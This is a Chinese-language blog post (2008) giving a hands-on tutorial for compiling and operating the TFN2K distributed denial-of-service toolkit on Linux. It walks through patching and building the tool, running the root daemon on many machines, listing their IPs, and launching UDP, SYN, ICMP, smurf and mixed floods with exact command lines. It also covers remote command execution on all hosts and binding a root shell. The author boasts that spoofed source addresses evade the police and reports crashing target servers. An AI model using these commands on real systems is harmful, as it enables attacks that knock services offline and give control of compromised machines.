专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅

首页 »Linux » linuxddos:Linux操作系统中实现DDOS攻击的思路方法 »正文

linuxddos:Linux操作系统中实现DDOS攻击的思路方法

来源: 发布时间:星期三, 2008年12月17日 浏览:2次 评论:0
  软件Software用是最有名DDOS首先说我们用来攻击客户机和服务器配置思路方法使用当下最有名REDHAT Linux进行测试本次攻击测试我使用是FEDORA CORE3

  开始设置服务器:

  解压 tar -zxvf tfn2k.tgz

  1.安装TFN2K

  TFN2K为开放原代码软件Software所以需要我们进行编译这个不用说了编译应该都会但有几个地方是必需注意使用区别版本和厂商Linux需要区别设置

  先修改src/ip.h

  注释掉以下部分否则编译出错

  /*struct in_addr

  {

  unsigned long  s_addr;

  }; */

  然后make进行编译

  编译时会提示你输入服务器端进行密码设置8-32位(攻击时候需要输入密码)编译后会出现两个新执行文件td 和 tfn,其中td是守护进程也是客户机使用进程而tfn是服务器控制进程如果想攻击别人就必需先起动td这个进程然后再运行服务器进程否则攻 击无效,更改密码可以执行mkpass进行更改最后在所有客户机中安装并运行td(需要ROOT权限)并且在服务器上建立个文本文件文件中记录 所有客户机IP地址(用VI编辑个就可行了)格式为:

  192.168.0.1

  192.168.0.2

  192.168.0.3

  IP

  IP

  .....

  然后在主服务器上运行./tfn

  2.DDOS攻击实现

  ./tfn直接回车大家可以看到些参数,英文好朋友估计不用我来多讲了:)

  格式./tfn <参数>

  无用参数我们不提,我们来说攻击用

  -f 这个参数后面跟刚才所写文本文件名,就是真正实现DDOS攻击,而不是DOS

  -h DOS攻击,也就是单机,攻击 后面跟个主机或IP地址

  -p 后面指定个端口,不用说了

  -c 最关键参数,共有11个选相

  0 - 停止攻击,发善心用

  1 - 反欺骗等级设定 ,TFN这个工具在攻击时候所发出数据包是带有源地址,但是源地址是随机,也就是说地址不是你自给,所以不用担心警察抓,哈哈

  2 - 改编数据包包尺寸:缺省ICMP/8,smurf,udp攻击缺省使用最小包你可以通过改变每个包有效载荷字节增加它大小

  3 - 绑定root shell:启动个会话服务然后你连接个指定端口就可以得到个root shell

  4 - UDP洪水攻击:这个攻击是利用这样个事实:每个udp包被送往个关闭端口这样就会有个ICMP不可到达信息返回增加了攻击能力

  5 - SYN洪水攻击:这个攻击有规律送虚假连接请求结果会是目标端口拒绝服务添瞒TCP连接表通过对不存在主机TCP/RST响应增加攻击潜力,是标准拒绝服务攻击.

  6 - ICMP响应(ping)攻击:这个攻击发送虚假地址ping请求目标主机会回送相同大小响应包

  7 - SMURF攻击:用目标主机地址发送ping请求以广播扩大这样目标主机将得到回复个多倍回复

  8 - MIX攻击:按照1:1:1关系交替发送udp,syn,icmp包这样就可以对付路由器其它包转发设备NIDS,snfers等,轮番轰炸:)

  9 - TARGA3攻击

  10 - 远程命令执行,这个参数是TFN附加功能,其实TFN攻击不仅仅是DOS,还可以远程进行明令控制,如:

  ./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有HOST上root家目录建立edison,-i后面跟"命令"

  参数基本说完,下面攻击

  ./tfn -f hostext -c 4 -i www.xxx.com

  使用hostext文件中记录主机对163服务器进行UDP攻击(所有主机中必需已经起动td进程)

  ./tfn -f hostext -c 5 -i www.xxx.com -p 80

  使用hostext文件中记录主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)

  ./tfn -f hostext -c 6 -i www.xxx.com

  使用hostext文件中记录主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)

  ./tfn -f hostext -c 8 -i www.xxx.com

  使用hostext文件中记录主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是snfer定哭死)

  ./tfn -f hostext -c 0

  让所由主机停止攻击

  基本说完,最后说说我测试结果

  攻击,攻击方式TCP 连接方式本地 本地CPU13% 被攻击服务器CPU使用率70%以上,并时时波动

   2对攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击服务器CPU使用率100%

   5对攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击服务器死机.本人家里只有6台机器,但如果再多点,几十台机器,个人服务器肯定要死掉了

  攻击,攻击方式ICMP 连接方式本地 本地CPU18% 被攻击服务器CPU使用率96%以上,并时时波动 2对攻击,攻击方式ICMP 连接方式本地 本地单机CPU18% 被攻击服务器以经无法上网,几乎无法使用,半小时内死机

相关文章

读者评论

  • 共0条 分0页

发表评论

  • 昵称:
  • 内容: